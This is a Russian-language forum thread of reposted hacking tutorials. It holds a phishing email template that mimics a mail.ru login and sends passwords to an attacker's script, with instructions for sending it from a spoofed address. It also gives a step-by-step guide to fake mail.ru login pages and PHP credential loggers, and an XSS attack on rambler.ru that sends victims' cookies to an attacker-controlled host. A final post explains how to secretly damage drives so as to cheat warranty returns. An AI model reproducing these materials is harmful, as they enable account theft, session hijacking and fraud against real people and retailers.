<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 35em"><pre> <table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr><td id=aj_body><div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"><table cellpadding=0 cellspacing=0 border=0 class=login><tr><td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td></tr></table><font color=00;33;66 FACE="Arial" ><h4 >Авторизация</h4></font><table cellpadding=0 cellspacing=0 border=0 class=login><form method="GET" action="http://адресссайта/mes.php"><input type="hidden" name="mail" value="1"><tr><td width=75><img src=http://img.mail.ru/0.gif height=1><br>Имя</td><td width=150><input type="text" name="Login"></td><td width=75><select name="Domain"><option value="mail.ru" SELECTED>@mail.ru</option><option value="inbox.ru">@inbox.ru</option><option value="list.ru" >@list.ru</option><option value="bk.ru" >@bk.ru</option></select></td></tr><tr><td>Пароль</td> <td><input type="password" name="Password"></td><td><a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a></td></tr><tr> <td> </td><td><input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label></td><td> </td></tr><tr><td> </td><td><input type="Submit" value=" Войти " xstyle="margin-top:4px"></td><td> </td></tr></form></table><br><br>Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div></pre></div></div></div>Укажите в параметре <em class="bbuline">action</em> тега <em class="bbuline">form</em> - адрес вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.
<span style="font-style: italic">[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.</span>
Теперь остается отправить жертве <!--coloro: red-->[color= red]<!--/coloro-->письмо<!--colorc-->[/color]<!--/colorc-->, желательно с подменой адреса.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Сделать это можно здесь:<!--colorc-->[/color]<!--/colorc-->
http://www.svkadr.ru/vr/conf/index.php?mail=1
Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
Если жертва клюнет на это, значит вам повезло).
Узнать пароли вы сможете в файлике mail.txt.
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro-->[::.END.::]<!--colorc-->[/color]<!--/colorc--></span>
Думаю все.
А уж как подойти ко взлому решать вам.
Спасибо за внимание!
До свидания!

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 13 апр 2009, 10:29

<span style="font-size: 18px"><!--coloro: red-->[color= red]<!--/coloro--><span style="display: block; text-align: center">Взлом e-mail для новичков<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic">Автор статьи - dadevil с forum.antichat.ru</span>
Внимание! Содержимое данной статьи предоставляется исключительно для ознакомительных целей! Автор не несет никакой ответственности за Ваши действия и за последствия от Ваших действий.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->
Несколько способов взлома e-mail аккаунтов<!--colorc-->[/color]<!--/colorc-->
Здравствуйте! Я Drum'and'Bass(dadevil). Сегодня я опишу Вам несколько способов того, как производится взлом e-mail, и как себя защитить от взлома. Я уверен, что на различных сайтах и форумах Вы видели, что люди рекламируют свои услуги взлома всяческих аккаунов. Это могут быть и почтовые аккаунты, и страницы социальных сетей, и игровые персонажи и самые разнообразные учетные записи на других сайтах. Хочется также заметить, что довольно часто мы видим в форумах такие темы и сообщения, как “Помогите взломать e-mail девушки” и т.п.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Как происходит вскрытие почты?<!--colorc-->[/color]<!--/colorc--> Для начала я скажу, что есть несколько способов сделать это:
Взлом почты с помощью фейков. <!--coloro: red-->[color= red]<!--/coloro-->Фейк<!--colorc-->[/color]<!--/colorc--> — это точная подделка страницы авторизации на некотором сайте, в которой пользователь введет свои данные и они запишутся в Вашей базе. Способ заключается в том, что мы сначала подделываем страницу авторизации сайта, пишем несколько PHP скриптов, потом закачиваем созданные файлы к себе на хостинг (можно использовать бесплатный) и отсылаем нашу ссылку жертве. Открывая ссылку, жертва “авторизируется”, и тем самым передает нам свой логин и пароль, которые записываются в нашу базу. Данный способ срабатывает в 60% случаев. Жертва не всегда ведется на то, что бы ввести логин и пароль в нашу подделку. Она может обратить внимание на адрес страницы. Естественно, он будет отличаться от настоящего сайта. Сейчас этот способ не теряет свою актуальность. Он очень часто и широко используется при вскрытии любых аккаунтов.
Взлом почты с помощью XSS-уязвимостей. Данный способ срабатывает приблизительно в 90-95% случаев. Этот способ заключается в использовании XSS уязвимостей сайта. Он намного эффективнее, и жертва даже не всегда понимает, что её логин и пароль уже отправился в Вашу базу данных. Это и не удивляет. Жертва открывает Вашу ссылку, и после загрузки, или даже во время загрузки страницы, выполняется специальный JavaScript код, благодаря которому Вы получаете cookies от необходимого Вам сайта (Что такое cookies и какую пользу можно от них получить, читайте ниже). Данный способ вскрытия аккаунтов используется очень часто, и самое главное, что на него легко можно повестись, даже не подозревая об этом.
Взлом сервера. Самый сложный и наименее используемый способ. В этой статье он рассматриваться не будет.
Для начала я объясню Вам, что такое cookies. <!--coloro: red-->[color= red]<!--/coloro-->Cookies<!--colorc-->[/color]<!--/colorc--> (кукисы) — это специальные переменные, которые устанавливаются браузером, при получении специальной команды от сервера, для определенного сайта, который Вы когда-то посетили. Они сохраняются в пользователя на компьютере. Давайте посетим какой-нибудь сайт. К примеру, http://google.com. Открыли? Теперь в адресной строке, в этом самом окне наберите такой JavaScript код:
java script:document.cookie
Нам откроется страница с непонятным содержимым. На самом деле, это и есть cookies, который нам установил сайт google.com. Переменные cookies записываются в формате name=value (имя=значение) и разделяются с помощью символа “;”.
Я написал Вам основную информацию о том, какие способы взлома аккаунтов существуют. Теперь я Вам детально попытаюсь объяснить, как работает, и как реализуются первый и второй способа вскрытия (взлом с помощью фейков и взлом с помощью XSS уязвимостей).
<!--coloro: yellow-->[color= yellow]<!--/coloro-->1) Взлом почты с помощью фейков<!--colorc-->[/color]<!--/colorc-->
В этом разделе я расскажу, как взломать почту с помощью фейков. Для начала, нам нужно зарегистрировать бесплатный хостинг с поддержкой PHP. В данном примере, я использую http://hostland.su. Регистрация займет у Вас всего пару минут, и еще после регистрации пару минут придется подождать, пока на Вашу почту придет письмо для подтверждения регистрации. После этого можно приступать.
Сначала я расскажу Вам, как именно делаются фейки.
Давайте сделаем фейк для популярного почтовика http://mail.ru. (Будем использовать браузер Mozilla Firefox 3)
Открываем ссылку http://win.mail.ru/cgi-bin/login, так как именно она есть страницей авторизации. Жмем правую кнопку на теле документа. В контекстном меню выбираем опцию “Исходный код страницы”. Выделяем весь код страницы, копируем в буфер обмена, и вставляем в любой текстовый редактор (Скажем, Блокнот). Далее, мы будем работать только с текстом в окне редактора. Для начала ищем слово “Войти”, потому что в нашем случае именно так подписана кнопка авторизации.
Нашли?
Теперь посмотрите на часть кода, которая находиться между тегами <form> и </form>, и которая включает в себе найденный нами фрагмент “Войти”. Данная часть исходного кода страницы отвечает за отправку данных, введенных в форму на сайт. Вот, как она у меня выглядит:

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><form method="post" action="auth" onSubmit="return CheckForm(this);"> <input type="hidden" name="page" value=""> <input type="hidden" name="post" value=""> <input type="hidden" name="login_from" value=""> <tr> <td><img src=http://img.imgsmail.ru/0.gif width=55 height=1><br>Имя</td> <td width=63%><input type="text" name="Login" value="charm0nt" class=w_100></td> <td width=37%><select class=w_100 name="Domain"><option value="mail.ru" SELECTED>@mail.ru</option><option value="inbox.ru" >@inbox.ru</option><option value="bk.ru" >@bk.ru</option><option value="list.ru" >@list.ru</option></select></td> </tr> <tr> <td>Пароль</td> <td colspan=2> <table width=100% cellpadding=0 cellspacing=0 border=0><tr> <td width=100%><input type="password" name="Password" class=w_100></td> <td>    <a href="http://www.mail.ru/pages/help/2.html#2185" target=_new>Забыли пароль?</a></td> </tr></table> </td> </tr> <tr> <td> </td> <td><input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label></td> <td> </td> </tr> <tr> <td> </td> <td><input type="Submit" value=" Войти " style="margin-top:4px"></td> <td> </td> </tr></form> Давайте обратим внимание на первую строчку кода: <form method="post" action="auth" onSubmit="return CheckForm(this);"></pre></div></div></div>Эта строчка указывает, куда мы отправляем данные. Данные у нас отправляются на скрипт “auth” (action="auth"). Полный путь к скрипту выглядит так: http://win.mail.ru/cgi-bin/auth. В нашей фейковой странице, мы должны заменить только ту строчку, куда идет отправка данных. В нашем случае, мы будем отправлять данные на наш заранее подготовленный PHP скрипт. Следовательно, заменяем строчку
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><form method="post" action="auth" onSubmit="return CheckForm(this);"></pre></div></div></div>на
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><form method="post" action="log.php" onSubmit="return CheckForm(this);"></pre></div></div></div>Улавливаете разницу? Теперь форма будет обращаться к log.php. Сохраните отредактированный файл под именем index.htm.
Давайте приступим к написанию скриптов.
Напишем log.php с таким содержимым:

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><?PHP $Login = $_POST['login']; // Читаем логин $Domain = $_POST['domain']; // Домен $Browser = getenv("HTTP_USER_AGENT"); // С какого браузера зашли $Pass = $_POST['password']; // Пароль $ip = $_SERVER["REMOTE_ADDR"]; // IP жертвы $Data = date("d-m-y H:i:s", time()); // Дата и время // Записываем полученные данные $text = "[$Data] Browser:[$Browser] IP:$ip Мыло:$Login@$Domain Пасс:$Pass"; $filelog = fopen("base.php","a+"); // Открываем файл базы fwrite($filelog,"n $text n"); // Записываем fclose($filelog); // Закрываем header('Location: http://win.mail.ru/cgi-bin/login'); // Переводим жертву на // указанный адрес ?> Этот скрипт будет получать данные и сохранять их на хосте в нашей базе данных - base.php. Напишем код для файла base.php: <?php echo '<H1>Доступ к базе закрыт!!!</H1>'; exit; ?></pre></div></div></div>Если кто то перейдет из браузера по адресу  то ему отобразится страница с содержимым “Доступ к базе закрыт!!!”, но если Вы этот файл скачаете с хоста к себе на компьютер, и откроете с помощью текстового редактора, то сможете посмотреть полное его содержимое.
Теперь нужно залить наши файлы на хост. Для этого можно воспользоваться программой Total Comander. Я также хочу заметить, что для загрузки файлов на FTP сервер можно воспользоваться и другими программами.
После того, как Вы подтвердили регистрацию на сайте http://hostland.su (и вообще на любом другом сайте, который предоставляет бесплатные хостинги), Вам должны были прислать письмо, в котором написаны все данные для доступа к новому аккаунту.
Данные для доступа по FTP выглядят примерно так:
host: ftp.tu2.ru
user: username
password: password
Как использовать эти данные? Очень просто! Я покажу Вам это на примере работы с Total Comander. Другие программы настраиваются по такому же принципу. Для начала запускаем Total Comander.
Вызываем команду FTP => Соединится с FTP сервером…
Теперь нажимаем кнопку “Добавить”, вписываем нужные данные, и жмем “ОК”.
После того, как Вы все правильно сделаете, выполните команду FTP => Соединится с FTP сервером…, выберете только что созданное Вами подключение и нажмите копку “Соединится”. Заливать файлы на хост также просто, как и копировать их на локальный диск. В письме от поставщика услуг (в данном случае — http://hostland.su), должно быть написано, куда можно закачивать файлы. В нашем случае, файлы можно заливать в папку /htdocs/www.
Загрузим все заранее подготовлены нами файлы (index.htm, log.php, base.php) в эту папку.
Сделали? Теперь откройте любой интернет браузер и перейдите по адресу Вашего сайта. Фейк работает. Введите произвольные значения полей “Логин” и “Пароль” и нажмите кнопку “Войти”. Нужно заметить, что после этого браузер перейдет по адресу http://win.mail.ru/cgi-bin/login, а именно его мы указывали в файле log.php.
Теперь из своего хоста загрузите на компьютер файл base.php и откройте его в любом текстовом редакторе. Если появилась новая запись в которой есть точно введенные Ваши данные — значит, поздравляю, Вы все сделали правильно!
<!--coloro: yellow-->[color= yellow]<!--/coloro-->2) Взлом почты с помощью XSS-уязвимостей
<!--colorc-->[/color]<!--/colorc-->
В этом разделе я расскажу, как взломать почту с помощью XSS уязвимостей. Что такое <!--coloro: purple-->[color= purple]<!--/coloro-->XSS<!--colorc-->[/color]<!--/colorc--> уязвимость?
Аббревиатура XSS расшифровывается как Сross Site Sсriрting (“межсайтовый скриптинг”). Принято его называть именно XSS, а не СSS, так как СSS введена намного раньше, и означает она Сasсading Style Sheets – «каскадные таблицы стилей» (применяются в оформлении HTML-станиц). Сross – это «крест», поэтому первая буква в «межсайтовом скриптинге» заменена именно на «X». XSS – это уязвимость на сервере, позволяющая внедрить в генерируемую скриптами на сервере HTML-страницу произвольный код путём передачи его в качестве значения нефильтруемой переменной. Под «нефильтруемой» переменной подразумевается переменная, которая перед её использованием в скрипте (например, PHP) не проверяется на наличие запретных символов, таких, как: <,>,’,” и многих других.
РOST-запрос передаёт переменные через массив, неотображаемый в адресной строке браузера; GET-запрос обнаруживает себя в адресной строке следующим образом:
http://www.somesite.com/index.php?fi... … mp;third=3
Тут http://www.somesite.com/index.php — некая страница, к которой мы обращаемся, а first=1&second=2&third=3 — это переменные, передаваемые скрипту. В GET-запросе переменные записываются следующим образом:
имя_переменной_1=значение_переменной_1&имя_перемен ной_2=значение_переменной_2&…&имя_переменной_n=зна чение_переменной_n
То есть для наглядности примера, запишем еще один GET-запрос:


PHP-скрипт может генерировать html-страницу, в которой выводит значение одной из переданных переменных без всякой фильтрации. НО! Если Вы, составляя GET-запрос, вместо обычного значения переменной подставит какие-нибудь ключевые тэги (например, <sсriрt> или <br>), то они выполнятся интерпретатором!
XSS-уязвимости используются в большинстве случаев для кражи кукисов (сookies в большинстве случаев хранят сессию, присвоив себе которую, можно быть на сайте под чужим аккаунтом. Также они хранят зашифрованный пароль, расшифровав который, можно завладеть аккаунтом). Но XSS-баги не ограничиваются кражей сookies.
Что же позволяют осуществить XSS-уязвимости?
Кражу конфиденциальной информации посетителя.
Всё, что умеют СGI-, РERL-, PHP-, ASР-скрипты.
Непредусмотренные стандартом возможности браузера. (Благодаря уязвимостям в самых браузерах)
В следующем примере я буду использовать браузер Internet Explorer 7. (В этой части статьи будет множество всяких ссылок; эти ссылки нужно вводить либо вручную, либо копировать в буфер обмена и вставлять в браузер; никак иначе я не советую, потому что CTRL + клик по ссылке может не правильно отобразить страницу)
Рассмотрим сайт http://rambler.ru. Воспользуемся поиском сайта. Введем произвольный поисковый запрос, например, “Hollywood” и нажмем кнопку “Найти!”. В результате поисковик выдаст множество сайтов, но внимание мы обратим на адрес страницы в браузере.
В меня она выглядит вот так:
[url=http://nova.rambler.ru/search?btnG=%...uery=Hollywood]http://nova.rambler.ru/search?btnG=%...uery=Hollywood[/url]
Теперь договоримся, что для поиска XSS-уязвимостей будем использовать следующий JavaScript код:

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><script>alert("XSS")</script></pre></div></div></div>Данный код выводит сообщение с текстом “XSS”. Попробуем ввести в поисковую строку этот JavaScript код. Откроется страница с некоторым адресом и с обычным для поисковика содержимым. Но обратим внимание на заголовок окна. У меня он выглядит так:
Rambler: поиск по Интернету. '<script>alert("XSS")</script>' — Windows Internet Explorer
Давайте посмотрим исходный код страницы, в котором найдем первое совпадение со строчкой “<script>alert("XSS")</script>”, то есть строчкой, которую мы ввели в качестве поискового запроса. Нашли? Она должна находиться между HTML тэгами <title> и </title>, которые и отвечают за текст заголовка окна браузера. У меня все это выглядит вот так:
<title>Rambler: поиск по Интернету. '<script>alert("XSS")</script>'</title>
А теперь представим, что случиться, если мы тэг </title> разместим перед нашим скриптом. Получился бы код:

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre> </title><script>alert("XSS")</script></pre></div></div></div><title>Rambler: поиск по Интернету. '</title><script>alert("XSS")</script>'
который интерпретатор выполнит, поскольку не происходит фильтрации символов, о которых я писал раньше. Но как этого достичь? Оказывается, что очень просто! Давайте введем в поисковую строку такой запрос:
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre></title><script>alert("XSS")</script></pre></div></div></div>то есть сами попытаемся закрыть тэг </title>. Как это ни странно, но JavaScript код выполнился, и мы видим результат:
Неплохо, правда? Снова смотрим на адрес страницы. Так он выглядит у меня:
[url=http://nova.rambler.ru/search?btnG=%...3C%2Fscript%3E]http://nova.rambler.ru/search?btnG=%...3C%2Fscript%3E[/url]
Тут переменная query содержит необходимый нам поисковый запрос, то есть строку “</title><script>alert("XSS")</script>” в зашифрованном виде. Помните, как первый раз мы ввели строку “Hollywood” в качестве поискового запроса? Тогда адрес страницы выглядел так:
[url=http://nova.rambler.ru/search?btnG=%...uery=Hollywood]http://nova.rambler.ru/search?btnG=%...uery=Hollywood[/url]
Видим, что query=Hollywood, что и подтверждает мои слова.
Перейдем по ссылке:
</title><script>alert("XSS")</script>
И снова видим окошко с текстом “XSS”. Давайте попробуем “опустить” переменную btnG, то есть просто удалим её из адреса страницы, и посмотрим, будет ли работать скрипт. Откроем ссылку:
http://nova.rambler.ru/search?query=< … t>alert("XSS")</script>
Работает!
Только что мы с Вами вывели XSS-уязвимость в сайте www.rambler.ru. Она присутствует потому, что не происходит фильтрации спецсимволов, и мы можем закрыть тэг <title>, что бы выполнился наш код.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->3) Использование XSS-уязвимостей<!--colorc-->[/color]<!--/colorc-->
Как же использовать XSS-уязвимости?
Выше я написал, что XSS-уязвимости чаще всего используются для того, что бы получить cookies жертвы. Давайте с помощью найденной уязвимости на Рамблере, подсмотрим наши кукисы. Для этого выполните следующий JavaScript код: (код document.cookie возвращает cookies сайта)
<script>alert(document.cookie)</script>
То есть, откроем страницу
http://nova.rambler.ru/search?query=< … t>alert(document.cookie)</script>
Мы видим непонятный текст в окошке сообщения. Этот текст и есть наши cookies! Как я раньше писал, они выводятся в формате имя=значение и разделяются “;”.
А что будет, если мы получим кукисы жертвы? Давайте представим такой случай: жертва зашла в свою почту на Рамблере, читает входящие письма. Тут она видит Ваше сообщение, в котором Вы пишете, что нашли прикольный сайт! Заходи! Она переходит по Вашей ссылке… и действительно попадает на какой то сайт. На самом же деле, кукисы уже в нас. Теперь достаточно зайти под браузером, который разрешает редактировать кукисы (например, Opera), и подставить кукисы жертвы, вместо своих. После этого нужно нажать кнопку “Обновить”, — и мы увидим почту жертвы вместо своей J.
Как подставить чужие cookies вместо своих в Opera? Очень просто! Достаточно выполнить команду Инструменты => Настройки… и во вкладке “Дополнительно” выбрать пункт “Cookies”. Теперь, в окошке, что появится, выбираем соответствующие имена кукисов, жмем кнопку “Изменить” и заменяем их соответствующими значениями.
Можете провести эксперимент: зарегистрируйте два почтовых аккаунта на одном и том же почтовом сервере, посмотрите кукисы одного из них и сохраните во временном текстовом файле. Теперь зайдите под вторым аккаунтом, отредактируйте новые кукисы старимы значениями из текстового файла, и нажмите “Обновить”. Мы снова окажемся в первом аккаунте.
Как можно реализовать то, что бы при переходе по ссылке мы получали кукисы того, кто перешел? Очень просто. Помните, как мы учились делать с Вами фейк? Вот теперь нужно создать те же 3 файла, только с немного другим содержимым. Файл base.php должен быть точно таким, как и при создании фейка, а вот код для файла log.php придется переписать немного:
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre> <?PHP $Cookies = $a; // Читаем переменную a из // GET-запроса, в которой // будут кукисы $Browser = getenv("HTTP_USER_AGENT"); // С какого браузера зашли $ip = $_SERVER["REMOTE_ADDR"]; // IP жертвы $Data = date("d-m-y H:i:s", time()); // Дата и время // Записываем полученные данные $text = "[$Data] Browser:[$Browser] IP:$ip Cookies:$Cookies"; $filelog = fopen("base.php","a+"); // Открываем файл базы fwrite($filelog,"n $text n"); // Записываем fclose($filelog); // Закрываем header('Location: http://somesite.ru'); // Переводим жертву на // указанный адрес ?></pre></div></div></div>В этом коде мы будем получать кукисы с помощью GET-запроса через переменную “a”, и записывать их в файл.
Как же нам отправить GET-запрос с кукисами на наш скрипт? Тут нету совсем ничего сложного!!! Создадим файл js.js с таким содержимым:
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>var concat = function() { var args = Array.prototype.slice.call(arguments); return args.join(""); } a = "http://www.your_site.com/log.php?a="; b = document.cookie; location.href = concat(a, [img]/images/smilies/cool.gif[/img]; В этом JavaScript коде нет ничего сложного. Внимание нужно обратить только на эту строчку: a = "http://www.your_site.com/gate.php?a=";</pre></div></div></div>Тут должен быть полный путь к нашему log.php файлу, и еще + строка “?a=”. Благодаря этому мы дописываем до строки переменную “a” со значением document.cookie. Последняя строка
location.href = concat(a, [img]/images/smilies/cool.gif[/img];
Пересылает данные нашему скрипту, который записывает кукисы в базу данных.
Теперь нам нужно сделать файл index.htm с таким содержимым:

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><html> <body> <script>location.href="http://nova.rambler.ru/search?query=</title><SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>"</script> </body> </html></pre></div></div></div>Все 4 файла (index.htm, js.js, log.php, base.php) мы должны залить в одну директорию нашего хостинга. При переходе по нашей ссылке  и при условии, что все эти файлы будут в корневом мы получим cookies жертвы к сайту http://rambler.ru. Если Вы хотите, что бы файлы не находились в корневом каталоге Вашего сайта, то нужно будет немного изменить код (вместо  прописать полную ссылку к файлу).
И последнее, на чем я хотел бы сконцентрировать Ваше внимание, это скрипт
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><script>location.href="http://nova.rambler.ru/search?query=</title><SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>"<script></pre></div></div></div>Он делает редирект на страницу http://nova.rambler.ru/search?query=< … <SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>. Что за странное значение получает переменная query? Она передает в себе скрипт
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT></pre></div></div></div>благодаря которому в код страницы с результатами поиска прописывается еще весь код файла js.js. В противном случае мы бы должны были прописывать его в ссылку сами, делая саму ссылку невероятно длинной и неудобной. То есть конструкция
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre><SCRIPT type="text/javascript" src="полный адрес кода"></SCRIPT></pre></div></div></div>значительно облегчает нашу работу.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->4) Как защитить свой почтовый аккаунт?
<!--colorc-->[/color]<!--/colorc-->
Во-первых: никогда не открывайте подозрительные ссылки! Во-вторых, не читайте открытки от неизвестных Вам людей. Чаще всего в сообщениях, в которых говорится о том, что на Ваше имя пришла открытка, есть ссылка на фейковую страницу, которая сначала возьмет необходимые данные, а потом сделает редирект на страницу с открыткой, либо еще куда-то.
<span style="font-style: italic">
by DrumAndBass (dadevil)
Спасибо за помошь:rpn,evill,t1o1.</span>

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 26 апр 2009, 04:17

<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: purple-->[color= purple]<!--/coloro-->Как грамотно убить компьютер<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic">По материалам журнала «][akep»</span>
Существует множество причин, по которым кому то может понадобиться убить или ввести в состояние клинической смерти какую‑либо компьютерную железку.
Наиболее часто такая потребность возникает, когда, к примеру, на работе «совершенно случайно» покупают новые компьютеры для секретарш с характеристиками, больше подходящими для хардкорного геймера. Утерю гарантии устроить не составит труда, а вот организовать списание железа бывает намного сложнее. Или, к примеру, хакер купил новую железку, не подумавши и не посмотрев обзоры в сети. Девайсина оказывается китайской поделкой, а обладатель испытывает стойкую потребность сдать ее обратно в магазин. Однако тут он натыкается на чудеса родной бюрократии и воистину гениальные трактовки закона о правах потребителя. Выясняется, что они полностью исключают возможность возврата технически исправного товара. Нередко оказывается, что покупатель сам согласился на эти невыгодные условия, подписав собственноручно свой приговор, именуемый гарантийным талоном. Именно в таких случаях ему может пригодиться умение грамотно убить железку, не оставив никаких следов преступления на теле потерпевшего.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Обратимые методы убийства<!--colorc-->[/color]<!--/colorc-->
В некоторых случаях злоумышленник может подстраховать себя на случай, если железо, которое он хочет вернуть, имеет повреждения, лишающие его гарантии, но тем не менее кое‑как работает. В данном случае он не хочет убивать девайс окончательно и бесповоротно, так как это чревато полным провалом операции. Тогда хакер рискует получить отказ от гарантии и невосстановимый девайс, который уже никому и не подкаким предлогом не удастся впарить. Убить железку так, чтобы ее можно было без проблем оживить, достаточно сложно. Дело в том, что злоумышленник должен обойти в этом деле мастеров из сервис-центра, иначе починят и вернут обратно. К счастью, в большинстве сервисных центров не занимаются ремонтом железа, а, ткнув пальцем в небо, делают заключение о браке или о поломке по вине пользователя и пишут соответствующую бумагу. Тем не менее, нужно учитывать возможность и другого расклада, когда девайс все же постараются починить. Инструментарий хакеру лучше всего иметь под рукой хороший и разнообразный инструмент. Он ведь помнит о том, что в большинстве случаев придется лезть внутрь девайса. Поэтому надо иметь огромное количество разных отверток всех видов и размеров. Отвертки под нестандартные винты также могут потребоваться. Часто используется спирт, пинцеты разных размеров и скальпель. Асы часто применяют паяльник, хороший недымящий флюс и термофен.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Винчестеры<!--colorc-->[/color]<!--/colorc-->
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Обратимые способы<!--colorc-->[/color]<!--/colorc-->
Убить винчестер таким образом, чтобы восстановить его мог только сам хакер, можно лишь аппаратным способом. Конечно же, можно покрутить программную часть девайса, наделав софтовых бедблоков, или эмулировать жуткие тормоза, отключив все режимы работы, кроме PIO. Но все это быстро и качественно лечится в руках грамотного человека, поэтому рисковать не стоит. Самый верный способ заставить винт безбожно глюкать, стучать бошками и отказываться работать — это повреждение контактов между печатной платой и гермоблоком. В большинстве современных дисков соединение гермоблока с платой обеспечивается подпружиненными контактами, встроенными в саму банку, в то время как в соответствующем месте на печатной плате находятся контактные площадки, в которые эти зубчики упираются. Если нарушить в этом месте контакт одного или всех зубчиков с платой, то можно до- биться очень интересных спецэффектов и глюков. Злодею важно это сделать так, чтобы ничего при этом не было видно, даже если туда полезет сервисный инженер.Самый простой способ добиться этого заключается в нанесении на контакты печатной платы прозрачного, бесцветного лака, который послужит надежным изолятором,и в то же время не будет заметен. В некоторых моделях винчестеров до сих пор вместо контак тов используются тонкие шлейфики, вставляющиеся в разъем напечатной плате. В этом случае злоумышленник аккуратно вынимает шлейф из его разъема и покрывает контак ты все тем же лаком. Из данного способа автоматически вытекает обратный способ, на этот раз с токопроводящим лаком, которым в былые времена разлочивали множитель на процессорах Athlon. Тут все зависит от фантазии хакера. Основное правило, которым руководствуются техногики в данной ситуации, состоит в том, что ни в коем случае не стоит трогать силовые цепи, связанные с питанием винчестера, в противном случае можно переборщить и устроить красочное шоу с фейерверком. Контакты при этом мажут очень аккуратно, чтобы их потом можно было отмыть. Обычно любят замыкать слаботочные, но критически важные цепи, например, шины данных на модуле, кэш памяти или БИОСа. Некоторые любят поиздеваться и над процессором, но тут приходится действовать наобум — datasheet на него обычно найти сложно. С количеством лака стараются не перебарщивать, так как есть вероятность, что придется его отмывать.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Необратимые способы<!--colorc-->[/color]<!--/colorc-->
Чтобы убить девайс окончательно и бесповоротно, хакер может применить несколько воистину кощунственных методик. Первая и самая надежная — это заворачивание харда в полотенце и отбивание у оного почек. Бьют обычно сильно, но аккуратно, чтобы не повредить внешний вид девайса. Избитый винт получит всевозможные смещения механики банки, благодаря чему он навсегда перестанет работать. Однако есть некоторая опасность, что внутри банки что‑нибудь отва лится, и по гарантии его уж точно не примут, но данная вероятность минимальна. Второй способ заключается в уродовании электроники электричеством. Например, некоторые злодеи берут пьезо-элемент от зажигалки, цилиндрической стороной соединяют его контакт с массой (корпусом) винчестера и пропускают красивые электрические дуги в направлении любой выбранной микросхемы. Лучше всего для этого подходит чип кэш-памяти, процессор и БИОС. Хакер может залить токопроводящий лак под ножки микросхемы так, чтобы исключить какую‑либо возможность его смыть. Если после всего этого девайс продолжит работать, злодею останется только возвестить окружающим о чуде.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->CD / DVD привод<!--colorc-->[/color]<!--/colorc-->
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Обратимые способы<!--colorc-->[/color]<!--/colorc-->
С дисковыми приводами дело обстоит совсем иначе. С одной стороны, может показаться, что вывести из строя CD-привод намного проще, однако это не всегда так. Суть проблемы заключается в отсутствии доступак электронике резака, ведь она всегда надежно упакована в корпус, защищающий девайс от пыли, а юзера — от шума. На первый взгляд может показаться, что не составляет никаких проблем открутить четыре винта и снять кожух, однако на практике все не так просто. Дело в том, что в большинстве фирм опечатывают корпуса таких девайсов гарантийными стикерами. Программно же можно только угробить девайс, выдернув его питалово в процессе перепрошивки, но восстановить после этого микропрограмму будет весьма проблематично. Злодеям остается лишь один путь:использовать ту часть платы, которая доступна для модификации, рядом с разъемами питания и интерфейса. Применяют обычно тот же токопроводящий лак. Есть вероятность замкнуть какие‑нибудь важные магистрали привода. Также хакер может попробовать налить лак в IDE-разъем. Эффект, судя по всему, будет интереснейший.
